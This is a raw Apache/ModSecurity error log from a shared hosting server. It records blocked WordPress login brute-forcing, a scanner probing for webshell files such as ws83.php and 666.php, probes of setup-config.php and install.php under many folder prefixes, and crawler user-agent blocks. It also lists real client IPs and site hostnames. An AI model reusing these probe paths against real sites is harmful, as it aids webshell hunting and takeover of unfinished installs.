[Tue May 26 19:40:49.813795 2026] [security2:error] [pid 70836:tid 70937] [remote 74.91.224.220:52080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWp6e_FvbQ_BhqVMRWLaAAA-WQ"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:40:49.904994 2026] [security2:error] [pid 70836:tid 71034] [client 20.151.117.104:28946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahWp6e_FvbQ_BhqVMRWLawAAAMk"]
[Tue May 26 19:40:49.905110 2026] [security2:error] [pid 70836:tid 71034] [client 20.151.117.104:28946] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahWp6e_FvbQ_BhqVMRWLawAAAMk"]
[Tue May 26 19:40:50.530732 2026] [security2:error] [pid 70836:tid 70955] [remote 3.208.180.187:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWp6u_FvbQ_BhqVMRWLggAAjnY"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 19:40:50.725220 2026] [security2:error] [pid 70836:tid 70911] [remote 162.214.184.71:42398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWp6u_FvbQ_BhqVMRWLiQAA1Uo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:40:51.162110 2026] [security2:error] [pid 70836:tid 70990] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp6u_FvbQ_BhqVMRWLjAAAAJ0"]
[Tue May 26 19:40:51.308805 2026] [security2:error] [pid 70836:tid 71037] [client 20.151.117.104:29356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/ws83.php"] [unique_id "ahWp6-_FvbQ_BhqVMRWLowAAAMw"]
[Tue May 26 19:40:51.308955 2026] [security2:error] [pid 70836:tid 71037] [client 20.151.117.104:29356] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/ws83.php"] [unique_id "ahWp6-_FvbQ_BhqVMRWLowAAAMw"]
[Tue May 26 19:40:51.429047 2026] [security2:error] [pid 70836:tid 71034] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWp6-_FvbQ_BhqVMRWLogAAAMk"]
[Tue May 26 19:40:52.105403 2026] [security2:error] [pid 70836:tid 71007] [client 14.229.112.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp6-_FvbQ_BhqVMRWLrQAAAK4"]
[Tue May 26 19:40:52.120792 2026] [security2:error] [pid 70836:tid 71020] [client 20.151.117.104:30122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/file61.php"] [unique_id "ahWp7O_FvbQ_BhqVMRWLxgAAALs"]
[Tue May 26 19:40:52.120898 2026] [security2:error] [pid 70836:tid 71020] [client 20.151.117.104:30122] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/file61.php"] [unique_id "ahWp7O_FvbQ_BhqVMRWLxgAAALs"]
[Tue May 26 19:40:52.782332 2026] [security2:error] [pid 70836:tid 71071] [client 20.151.117.104:29671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/sadcut1.php"] [unique_id "ahWp7O_FvbQ_BhqVMRWL3QAAAO4"]
[Tue May 26 19:40:52.782472 2026] [security2:error] [pid 70836:tid 71071] [client 20.151.117.104:29671] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/sadcut1.php"] [unique_id "ahWp7O_FvbQ_BhqVMRWL3QAAAO4"]
[Tue May 26 19:40:53.379072 2026] [security2:error] [pid 70836:tid 70984] [client 87.106.152.203:58514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.karuppuswamykovil.in"] [uri "/images/images/cache.php"] [unique_id "ahWp7e_FvbQ_BhqVMRWL9AAAAJc"], referer: www.google.com
[Tue May 26 19:40:53.433517 2026] [security2:error] [pid 70836:tid 71070] [client 20.151.117.104:27827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/y.php"] [unique_id "ahWp7e_FvbQ_BhqVMRWL9wAAAO0"]
[Tue May 26 19:40:53.433652 2026] [security2:error] [pid 70836:tid 71070] [client 20.151.117.104:27827] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/y.php"] [unique_id "ahWp7e_FvbQ_BhqVMRWL9wAAAO0"]
[Tue May 26 19:40:53.599483 2026] [security2:error] [pid 70836:tid 70925] [remote 141.95.202.18:54590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWp7e_FvbQ_BhqVMRWL-wAA5lg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:40:53.714777 2026] [security2:error] [pid 70836:tid 70998] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp7e_FvbQ_BhqVMRWL7gAAAKU"]
[Tue May 26 19:40:53.716753 2026] [security2:error] [pid 70836:tid 70940] [remote 94.23.188.201:53700] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "glorodbalsa.com"] [uri "/robots.txt"] [unique_id "ahWp7e_FvbQ_BhqVMRWMBgAApmc"]
[Tue May 26 19:40:53.716915 2026] [security2:error] [pid 70836:tid 70999] [client 94.23.188.201:53700] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodbalsa.com"] [uri "/robots.txt"] [unique_id "ahWp7e_FvbQ_BhqVMRWMBgAApmc"]
[Tue May 26 19:40:53.994913 2026] [ssl:error] [pid 70836:tid 70936] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:53.995645 2026] [ssl:error] [pid 70836:tid 70870] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:53.995663 2026] [ssl:error] [pid 70836:tid 70844] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:54.050387 2026] [ssl:error] [pid 70836:tid 70858] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:54.050876 2026] [ssl:error] [pid 70836:tid 70866] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:54.050902 2026] [ssl:error] [pid 70836:tid 70951] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:54.102560 2026] [ssl:error] [pid 70836:tid 70854] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:54.138270 2026] [security2:error] [pid 70836:tid 71045] [client 20.151.117.104:30425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/666.php"] [unique_id "ahWp7u_FvbQ_BhqVMRWMGAAAANQ"]
[Tue May 26 19:40:54.138408 2026] [security2:error] [pid 70836:tid 71045] [client 20.151.117.104:30425] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/666.php"] [unique_id "ahWp7u_FvbQ_BhqVMRWMGAAAANQ"]
[Tue May 26 19:40:54.226569 2026] [ssl:error] [pid 70836:tid 70864] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:54.233816 2026] [ssl:error] [pid 70836:tid 70920] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:54.233879 2026] [ssl:error] [pid 70836:tid 70875] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:54.407351 2026] [ssl:error] [pid 70836:tid 70867] [remote 31.94.28.21:53125] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 19:40:54.826221 2026] [security2:error] [pid 70836:tid 71006] [client 20.151.117.104:30407] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/7.php"] [unique_id "ahWp7u_FvbQ_BhqVMRWMNwAAAK0"]
[Tue May 26 19:40:54.826332 2026] [security2:error] [pid 70836:tid 71006] [client 20.151.117.104:30407] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/7.php"] [unique_id "ahWp7u_FvbQ_BhqVMRWMNwAAAK0"]
[Tue May 26 19:40:55.163255 2026] [security2:error] [pid 70836:tid 70945] [remote 209.42.19.17:39900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWp7u_FvbQ_BhqVMRWMPAAA7Gw"]
[Tue May 26 19:40:55.180541 2026] [security2:error] [pid 70836:tid 70946] [remote 51.222.168.229:23670] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "glorodbalsa.com"] [uri "/"] [unique_id "ahWp7-_FvbQ_BhqVMRWMRgAA_20"]
[Tue May 26 19:40:55.180720 2026] [security2:error] [pid 70836:tid 71088] [client 51.222.168.229:23670] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodbalsa.com"] [uri "/"] [unique_id "ahWp7-_FvbQ_BhqVMRWMRgAA_20"]
[Tue May 26 19:40:55.456373 2026] [security2:error] [pid 70836:tid 71057] [client 20.151.117.104:30457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-config-sample.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMUQAAAOA"]
[Tue May 26 19:40:55.456531 2026] [security2:error] [pid 70836:tid 71057] [client 20.151.117.104:30457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/wp-config-sample.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMUQAAAOA"]
[Tue May 26 19:40:55.606408 2026] [security2:error] [pid 70836:tid 71093] [client 54.205.63.235:58319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMUwAAAQQ"]
[Tue May 26 19:40:55.691682 2026] [security2:error] [pid 70836:tid 71058] [client 54.205.63.235:59061] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMWQAAAOE"]
[Tue May 26 19:40:55.692236 2026] [security2:error] [pid 70836:tid 71082] [client 54.205.63.235:59067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/wp-admin/install.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMXgAAAPk"]
[Tue May 26 19:40:55.692330 2026] [security2:error] [pid 70836:tid 71081] [client 54.205.63.235:59064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMXAAAAPg"]
[Tue May 26 19:40:55.692365 2026] [security2:error] [pid 70836:tid 70987] [client 54.205.63.235:59066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMXQAAAJo"]
[Tue May 26 19:40:55.692406 2026] [security2:error] [pid 70836:tid 71065] [client 54.205.63.235:59068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMXwAAAOg"]
[Tue May 26 19:40:55.692526 2026] [security2:error] [pid 70836:tid 71045] [client 54.205.63.235:59062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMWgAAANQ"]
[Tue May 26 19:40:55.692545 2026] [security2:error] [pid 70836:tid 71058] [client 54.205.63.235:59070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMYAAAAOE"]
[Tue May 26 19:40:55.692748 2026] [security2:error] [pid 70836:tid 71008] [client 54.205.63.235:59071] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMYQAAAK8"]
[Tue May 26 19:40:55.693116 2026] [security2:error] [pid 70836:tid 70970] [client 54.205.63.235:59063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMWwAAAIk"]
[Tue May 26 19:40:55.693295 2026] [security2:error] [pid 70836:tid 70983] [client 54.205.63.235:59065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMYgAAAJY"]
[Tue May 26 19:40:55.693528 2026] [security2:error] [pid 70836:tid 71067] [client 54.205.63.235:59069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMYwAAAOo"]
[Tue May 26 19:40:55.697690 2026] [security2:error] [pid 70836:tid 71019] [client 54.205.63.235:59073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMZAAAALo"]
[Tue May 26 19:40:55.697690 2026] [security2:error] [pid 70836:tid 71033] [client 54.205.63.235:59072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMZQAAAMg"]
[Tue May 26 19:40:55.698680 2026] [security2:error] [pid 70836:tid 70979] [client 54.205.63.235:59074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMZgAAAJI"]
[Tue May 26 19:40:55.817202 2026] [security2:error] [pid 70836:tid 71029] [client 54.205.63.235:59166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jetstarprojects.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMawAAAMQ"]
[Tue May 26 19:40:55.825806 2026] [security2:error] [pid 70836:tid 71060] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp7-_FvbQ_BhqVMRWMUAAAAOM"]
[Tue May 26 19:40:56.174279 2026] [security2:error] [pid 70836:tid 71020] [client 20.151.117.104:29339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/log.php"] [unique_id "ahWp8O_FvbQ_BhqVMRWMeQAAALs"]
[Tue May 26 19:40:56.174385 2026] [security2:error] [pid 70836:tid 71020] [client 20.151.117.104:29339] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/log.php"] [unique_id "ahWp8O_FvbQ_BhqVMRWMeQAAALs"]
[Tue May 26 19:40:56.710155 2026] [security2:error] [pid 70836:tid 71093] [client 20.151.117.104:30111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/a5.php"] [unique_id "ahWp8O_FvbQ_BhqVMRWMhgAAAQQ"]
[Tue May 26 19:40:56.710253 2026] [security2:error] [pid 70836:tid 71093] [client 20.151.117.104:30111] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/a5.php"] [unique_id "ahWp8O_FvbQ_BhqVMRWMhgAAAQQ"]
[Tue May 26 19:40:56.773291 2026] [security2:error] [pid 70836:tid 71030] [client 85.208.96.198:58856] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahWp8O_FvbQ_BhqVMRWMigAAAMU"]
[Tue May 26 19:40:56.773459 2026] [security2:error] [pid 70836:tid 71030] [client 85.208.96.198:58856] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahWp8O_FvbQ_BhqVMRWMigAAAMU"]
